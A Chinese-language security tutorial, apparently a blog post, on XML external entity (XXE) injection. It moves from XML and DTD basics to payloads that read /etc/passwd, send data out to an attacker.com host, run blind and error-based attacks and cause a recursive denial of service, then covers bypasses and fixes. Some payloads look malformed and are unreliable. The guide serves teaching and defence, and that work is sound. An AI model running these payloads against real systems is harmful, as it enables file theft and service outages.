XXE-XML实体注入漏洞

目录

1.xml基础

1.1什么是xml

1.2xml文档结构

[1.3 什么是DTD](#1.3 什么是DTD)

[1.4 什么是实体](#1.4 什么是实体)

[1.5 什么是外部实体](#1.5 什么是外部实体)

2.xxe漏洞

2.1xxe漏洞基本介绍

2.2xxe漏洞的危害

经典漏洞案例分析

3.xxe漏洞挖掘和利用

[3.1. 识别潜在的XML入口](#3.1. 识别潜在的XML入口)

[3.2. 检查XML处理逻辑](#3.2. 检查XML处理逻辑)

[3.3. 构造试探Payload](#3.3. 构造试探Payload)

常见的一般payload

xxe盲注

xxe报错注入

xxe漏洞实现dos攻击

4.xxe的bypass

5.xxe漏洞修复

留言


1.xml基础

1.1什么是xml

XML全称"可扩展标记语言"(extensible markup language),XML是一种用于存储和传输数据的语言。与HTML一样,XML使用标签和数据的树状结构。但不同的是,XML不使用预定义标记,因此可以为标记指定描述数据的名称。

1.2xml文档结构

xml声明+DTD文档类型定义+文档元素

其中<note>是根元素,所有XML文档必须包含一个根元素,根元素是所有其他元素的父元素。

1.3 什么是DTD

DTD(document type definition)文档类型定义用于定义XML文档的结构,它作为xml文件的 一部分位于XML声明和文档元素之间,比如下面DTD

它就定义了 XML 的根元素必须是message,根元素下面有一些子元素,所以 XML必须像下 面这么写:

其中,DTD需要在!DOCTYPE注释中定义根元素,而后在中括号的[]内使用!ELEMENT注 释定义各元素特征。

1.4 什么是实体

再看下面一个DTD:

很容易理解,它规定了xml文件的根元素是foo,但ANY说明接受任何元素。重点是!ENTITY, 这就是我们要提到的实体,实体本质是定义了一个变量,变量名xxe,值为"test",后面在 XML 中通过 & 符号进行引用,所以根据DTD我们写出下面的xml文件

因为ANY的属性,元素我们可以随意命令,但user值通过&xxe,实际值为test

1.5 什么是外部实体

知道了什么是实体,再说说其实实体分为两种,内部实体和外部实体,上面的例子就是内部 实体。XML外部实体是一种自定义实体,定义位于声明它们的DTD之外,声明使用SYSTEM 关键字,比如加载实体值的URL:

这里URL可以使用file://协议,因此可以从文件加载外部实体。例如:

这也是产生XXE漏洞的原因。

2.xxe漏洞

2.1xxe漏洞基本介绍

xml外部实体注入,全称为XML external entity injection,某些应用程序允许XML格式的数据 输入和解析,可以通过引入外部实体的方式进行攻击。

2.2xxe漏洞的危害

  1. 本地文件读取: 攻击者可以通过XXE漏洞读取服务器上的任意文件,包括但不限于配置文件、日志文件、数据库凭证文件等敏感信息。

  2. 远程文件包含: 如果服务器允许解析外部实体并支持DNS或HTTP实体,攻击者可以利用XXE漏洞从远程服务器下载数据,甚至发起DoS攻击。

  3. 内部网络探测: 通过构造特殊的实体,攻击者可以利用XXE漏洞执行内网端口扫描,收集内网服务器信息。

  4. 拒绝服务攻击(DoS): XXE攻击可能导致服务器消耗大量资源,例如通过递归引用外部实体或发起大量的网络请求,从而引发拒绝服务攻击。

  5. SOAP服务攻击: 在处理SOAP请求的服务中,如果未正确处理XML实体,攻击者可能利用XXE漏洞影响服务的稳定性和安全性。

  6. 命令执行: 在极少数情况下,如果服务器配置极其不当,攻击者可能通过XXE漏洞执行系统命令,进一步扩大攻击范围。

  7. 绕过防火墙和身份验证: 通过将攻击负载封装在XML文档中,并利用服务器的信任链,攻击者可能绕过防火墙规则和身份验证机制。

经典漏洞案例分析

推文:微信支付sdk被曝xxe漏洞,漏洞原理分析-CSDN博客

3.xxe漏洞挖掘和利用

3.1. 识别潜在的XML入口

寻找应用中所有可能处理XML输入的位置,包括但不限于:

  • API接口
  • SOAP/WSDL服务
  • XML-RPC调用
  • XML解析器调用

3.2. 检查XML处理逻辑

分析应用程序如何处理XML数据,特别是那些可能包含DTD(Document Type Definition)或Entity声明的XML。查看源代码或使用抓包工具(如Burp Suite、Wireshark)捕获HTTP请求和响应,查找XML解析相关的代码或配置。

3.3. 构造试探Payload


常见的一般payload

3.3.1.使用外部实体 进行文件读取。

条件:

  1. 可以引用外部实体
  2. 服务器要回显结果
XML 复制代码
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
   <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>
<foo>&xxe;</foo>


#如果是使用windows系统,则文件名为 file:///c:/windows/win.ini

3.3.2.还可以使用外部参数实体 +外部实体 进行文件读取。

攻击者发受害者

XML 复制代码
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY % xxe SYSTEM "http://xxxx/evil.dtd">
%xxe;]>
<foo>&evil;</foo>

攻击者远程文件evil.dtd

XML 复制代码
#此处为evil.dtd文件内容

<!ENTITY evil SYSTEM "file:///c:/windows/win.ini" >

xxe盲注

盲注是一种利用XXE漏洞进行信息收集的技术,当服务器在处理XML数据时,因配置问题允许外部实体的解析,但并不会在响应中直接返回外部实体包含的内容时,就需要使用盲注技术来获取信息。

在XXE盲注中,攻击者不能直接看到服务器返回的错误消息或实体包含的数据。因此,他们需要通过构造特殊的XML Payload,利用服务器对外部实体的解析行为来间接获取信息。通常的做法是:

1.布尔型盲注

构造Payload,使其尝试访问一个已知存在或不存在的文件或网络资源,通过服务器响应时间的差异、HTTP状态码的改变或其他可观察的变化来判断请求是否成功。

例如,判断文件是否存在:

XML 复制代码
<!DOCTYPE test [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % true "<!ENTITY xxe SYSTEM 'file:///dev/null'>">
  %true;
]>
<root>&xxe;</root>

2. 基于时间的盲注(Time-Based Blind XXE)

判断系统命令执行耗时:

XML 复制代码
<!DOCTYPE test [
  <!ENTITY % file SYSTEM "java -classpath ../../../../../../bin/commons-httpclient-3.1.jar org.apache.commons.httpclient.HttpClient http://attacker.com/ & sleep 5">
  <!ENTITY % true "<!ENTITY xxe SYSTEM '%file;'>">
  %true;
]>
<root>&xxe;</root>

#如果服务器响应时间增加明显,则可能执行了耗时的系统命令。
  • <!ENTITY % file SYSTEM "...">:定义了一个名为file的外部实体,它的值是一个系统命令。
  • java -classpath ../../../../../../bin/commons-httpclient-3.1.jar org.apache.commons.httpclient.HttpClient http://attacker.com/:这是一个Java命令行指令,它使用Commons HttpClient库去向攻击者控制的服务器http://attacker.com/发送一个HTTP请求。这意味着当服务器解析并执行此实体时,它会触发一个网络请求到攻击者的服务器。
  • sleep 5:这是一个Linux命令,会让进程暂停5秒。这个部分通常用于基于时间的盲注,攻击者可以通过测量服务器响应延迟来判断命令是否被执行。

3. 带外通信(Out-of-Band, OOB)利用

尝试将数据发送到攻击者控制的服务器:

XML 复制代码
<!DOCTYPE test [
  <!ENTITY % file SYSTEM "http://attacker.com/?data=<data_to_send>">
]>
<root>&file;</root>


#<data_to_send>会被替换为实际要发送的数据,比如从受害服务器中获取的敏感信息。

攻击者在其自己的服务器上监听,如果接收到请求,则意味着服务器可能受到XXE攻击并执行了外部实体。

xxe报错注入

1.文件路径泄露

攻击者可能构造一个导致服务器尝试打开不存在文件的实体,从而在错误消息中包含文件路径或其他上下文信息。这种情况下,报错注入的Payload可能是:

XML 复制代码
<!DOCTYPE test [
  <!ENTITY xxe SYSTEM "file:///non_existent_path">
]>
<root>&xxe;</root>

当服务器尝试解析这个XML并执行实体xxe时,由于指定的文件路径不存在,服务器可能会返回一个包含详细错误信息的HTTP响应。攻击者可以根据这些错误信息,逐步揭示服务器的内部结构。


2.DTD(Document Type Definition)错误利用: 利用DTD错误,如无限递归或未知实体引用,迫使XML解析器崩溃或返回详细的错误消息,其中可能包含服务器的环境信息。

XML 复制代码
<!DOCTYPE test [
  <!ENTITY % evil SYSTEM "http://attacker.com/evil.dtd">
  <!ENTITY % inner "<!ENTITY % injected SYSTEM 'file:///etc/passwd'>">
  %evil;
  %inner;
]>
<root></root>

在上述示例中,攻击者首先定义了一个实体%evil,指向恶意DTD文件,然后定义了实体%inner,尝试读取服务器上的/etc/passwd文件。如果服务器允许DTD继承并解析了恶意DTD文件,可能会执行%injected实体,从而导致文件读取和错误泄漏。


3.XPath注入与错误利用: 如果服务器使用了可配置的XPath查询,并且在处理XML时对查询结果进行了错误处理,攻击者可以通过构造特殊的XPath表达式导致错误,从而泄露信息。

XML 复制代码
<?xml version="1.0"?>
<!DOCTYPE poc [
  <!ENTITY % ext SYSTEM "file:///etc/passwd">
  <!ENTITY % xpath '<!ENTITY &#x25; xp "<!ENTITY &#x25; error SYSTEM 'file:///etc/passwd'>">>
  %xpath;
  %xp;
]>
<x:xmp xmlns:x="http://www.w3.org/XML/1998/namespace">
  <query>
    <x:select>/root/*[name()='item' and value='bad_value' or substring-after(value,'error')=%error;]</x:select>
  </query>
</x:xmp>

此例中,攻击者尝试结合XPath注入和XXE来触发错误。尽管这通常不会导致错误信息的直接泄露,但可能会利用XPath的逻辑导致包含恶意实体的查询被执行。


4.Schema Validation Exploitation: 当服务器在处理XML时使用了XML Schema验证,并且对验证失败的错误处理不当,攻击者可以构造恶意的XML Schema实体,导致验证失败时泄露信息。

XML 复制代码
<?xml version="1.0"?>
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
  <xs:import schemaLocation="http://attacker.com/malicious.xsd"/>
  <xs:element name="root">
    <!-- 正常定义元素 -->
  </xs:element>
</xs:schema>
<root></root>

此例中,攻击者尝试导入一个恶意的XML Schema文件,该文件可能包含引起错误的构造,导致服务器在验证XML文档时触发错误。


5.Out-of-Band(OOB)错误利用: 通过触发服务器向攻击者控制的服务器发送请求并在请求中包含错误信息,攻击者可以通过监控他们的服务器日志来收集泄露的信息。

XML 复制代码
<!DOCTYPE test [
  <!ENTITY % file SYSTEM "http://attacker.com/error.xml">
  <!ENTITY % oob SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd">
  <!ENTITY % sendError "<!ENTITY &#x25; result SYSTEM 'http://attacker.com/receive?data=%oob;'>">
  %sendError;
  %result;
]>
<root>&file;</root>

在此示例中,攻击者首先尝试读取本地文件/etc/passwd并Base64编码,然后将编码后的数据通过OOB发送到攻击者控制的服务器,如果处理不当,可能会在OOB请求中附带错误信息。


xxe漏洞实现dos攻击

XXE(XML External Entity Injection)漏洞实现DoS(Denial of Service,拒绝服务)攻击的方法主要依赖于利用XML解析器对外部实体的处理机制,通过构造特定的XML Payload,使得服务器在解析XML文档时陷入循环、消耗大量资源或者发起大量网络请求,从而达到拒绝服务的目的。

XML 复制代码
<!DOCTYPE root [
<!ENTITY % load SYSTEM "file:///dev/zero">
<!ENTITY % endless "&%load;&endless;">
]>
<root>&endless;</root>

在这个例子中,攻击者定义了一个外部实体%load,它尝试从/dev/zero设备文件(一个无穷尽的空字节流)加载数据。接着,定义了一个递归实体%endless,它引用自身,形成无限递归。

当服务器尝试解析这段XML时,会不断地尝试读取/dev/zero,导致内存溢出或CPU使用率飙升,最终导致服务不可用。同样的,攻击者还可以构造类似的Payload,让它不断发起网络请求到一个繁忙或者慢速的资源,占用服务器的网络资源,从而实现DoS攻击。


4.xxe的bypass

XXE(XML External Entity Injection)漏洞的绕过通常是指攻击者在面对某些安全措施时,通过创新或巧妙的方法依然能够利用XXE漏洞。这是因为有些防御措施并未彻底解决XXE的根本问题,或者是新出现的漏洞利用技术能够规避现有的防御措施。以下是一些XXE绕过的常见技术:

  1. 禁用实体加载的绕过

    • 有时服务器会禁用XML解析器对外部实体的加载,但可能仍允许内部实体或DTD的解析。攻击者可能通过构造内部实体绕过这一限制,如利用内部实体的递归来消耗服务器资源,实现DoS攻击。
  2. 禁用DTD的绕过

    • 有些服务器禁止了DTD解析,但仍可能允许XML模式(XSD)或架构的解析。攻击者可能利用XML模式中的漏洞来实现XXE攻击。
  3. 带外(OOB, Out-of-Band)信息泄露

    • 当服务器不返回实体内容时,攻击者可以构造实体指向攻击者控制的服务器,利用服务器端的网络行为(如发起请求)来进行信息泄露,而不依赖于服务器的直接响应。
  4. XPath注入

    • 如果服务器使用了XPath查询,并且这些查询基于用户输入,攻击者可能结合XXE和XPath注入,构造恶意查询来获取敏感信息或执行系统命令。
  5. 滥用特性

    • 攻击者可能利用XML解析器的其他特性,如php://input伪协议、XML解析器的解析错误等,来执行攻击。
  6. 利用旧版或有已知漏洞的XML解析器

    • 服务器可能仍在使用老旧版本的XML解析器,这些版本可能包含已知的XXE漏洞,而服务器管理员未能及时更新。

bypass具体推文:

https://www.cnblogs.com/zhengna/p/15740341.html

5.xxe漏洞修复

修复XXE(XML External Entity Injection)漏洞通常涉及多种策略,以下是一些关键的修复措施:

1. 禁用外部实体解析:

对于使用PHP处理XML的场景,可以通过libxml_disable_entity_loader()函数禁用外部实体加载器,例如:

php 复制代码
#php
libxml_disable_entity_loader(true);

对于其他语言和XML解析器,查阅对应的文档以找到禁用外部实体加载的方法。

2.过滤XML内容:

在处理XML之前,对XML数据进行严格的净化和过滤,移除或替换掉潜在的实体声明、DOCTYPE定义等内容。

对于用户上传的XML数据,可以考虑使用安全的XML解析器,只允许解析预定义的、安全的XML结构。

3.Web应用防火墙(WAF)配置:

设置WAF规则以阻止或重写包含可疑实体声明、DOCTYPE定义或其他可能触发XXE攻击的XML请求。

可以通过正则表达式或专门的安全策略来检测并阻止含有XXE攻击特征的XML内容。

4.应用程序层的防御:

在应用程序代码层面,避免直接将用户提供的XML数据传递给XML解析器,而是先进行清理或转换。

对于允许用户上传XML的场景,使用白名单策略,仅允许符合特定结构和内容规则的XML数据。

5.服务器配置与升级:

更新XML解析器到最新版本,很多较新的版本都已经默认关闭了外部实体加载,或者提供了更为安全的配置选项。

严格配置服务器,禁止解析来自不可信来源的DTD文件。

留言

祝各位学习顺利!!!

相关推荐
mingzhi6119 小时前
渗透测试-快速获取目标中存在的漏洞(小白版)
安全·web安全·面试·职场和发展
安胜ANSCEN1 天前
加固筑牢安全防线:多源威胁检测响应在企业网络安全运营中的核心作用
网络·安全·web安全·威胁检测·自动化响应
小百菜1 天前
dom4j实现xml转map,xml转json字符串
xml·json·xml转map·xml转json
玄客)1 天前
XML标记语言
xml
超栈1 天前
蓝桥杯-网络安全比赛题目-遗漏的压缩包
前端·网络·sql·安全·web安全·职场和发展·蓝桥杯
黑龙江亿林等级保护测评1 天前
DDOS防护介绍
网络·人工智能·安全·web安全·智能路由器·ddos
kali-Myon1 天前
NewStarCTF2024-Week5-Web&Misc-WP
前端·python·学习·mysql·web安全·php·web
知孤云出岫1 天前
网络安全渗透实际案例
安全·web安全
文人sec1 天前
泷羽sec学习打卡-shodan扫描4
网络·学习·安全·web安全